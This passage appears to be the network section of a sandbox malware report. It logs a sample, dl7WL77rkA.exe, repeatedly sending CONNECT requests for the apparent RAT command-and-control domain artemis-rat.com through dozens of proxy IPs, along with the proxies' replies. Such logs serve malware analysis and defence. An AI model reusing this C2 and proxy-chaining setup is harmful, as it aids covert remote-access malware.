                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1037192.168.2.5527428.213.128.904443876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.882169962 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1038192.168.2.552156162.253.68.9741453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.884237051 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1039192.168.2.55064151.158.96.66163793876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.886161089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.742512941 CET729INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1040192.168.2.550662171.244.140.160270563876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.891829967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.996813059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.014667988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1041192.168.2.5507505.252.23.24910803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.912838936 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.092350006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.093231916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.092979908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1042192.168.2.552741103.118.44.6180803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.915467978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1043192.168.2.552299221.151.181.10180003876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.923662901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.092407942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.093859911 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.092979908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1044192.168.2.552342139.224.64.19180813876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.926528931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.254502058 CET767INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                            Server: Beaver
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 635
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1045192.168.2.550749188.215.245.235803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.929285049 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.092415094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.093899965 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.093014956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1046192.168.2.552323181.115.207.11510803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.933646917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1047192.168.2.550664148.72.206.84306513876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.936677933 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1048192.168.2.550759208.109.14.49373773876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.936753035 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.092639923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.093862057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.093007088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1049192.168.2.552748181.12.80.21120003876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.937097073 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1050192.168.2.552843107.180.103.214132863876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.946494102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.498675108 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1051192.168.2.55277751.15.242.20288883876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.029895067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.806175947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.811480045 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.608525038 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1052192.168.2.55278431.200.242.20199853876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.030690908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1053192.168.2.55275295.164.89.12388883876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.030693054 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.332989931 CET327INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:42 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 166
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1054192.168.2.552765130.162.213.17531293876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.030757904 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.349515915 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1055192.168.2.55287223.95.209.142156733876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.031367064 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1056192.168.2.552840198.199.86.1131283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.031542063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.412338972 CET28INHTTP/1.1 400 Bad Request


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1057192.168.2.55285138.162.13.18531283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.031915903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.488413095 CET111INHTTP/1.1 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm=""
                                                                                                                                                                                                                                                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                                                                                                                                                                                                                                            Data Ascii: Proxy Authentication Required


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1058192.168.2.552764222.255.238.159803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.032095909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.364196062 CET481INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:42 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                            Location: https://ktxcomay.com.vn
                                                                                                                                                                                                                                                            Content-Length: 289
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://ktxcomay.com.vn">here</a>.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.283828974 CET481INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:42 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                            Location: https://ktxcomay.com.vn
                                                                                                                                                                                                                                                            Content-Length: 289
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://ktxcomay.com.vn">here</a>.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1059192.168.2.552757178.54.21.20380813876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.032097101 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1060192.168.2.55279191.134.140.160325883876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
Mar 11, 2024 03:30:42.032480001 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:42.806293964 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
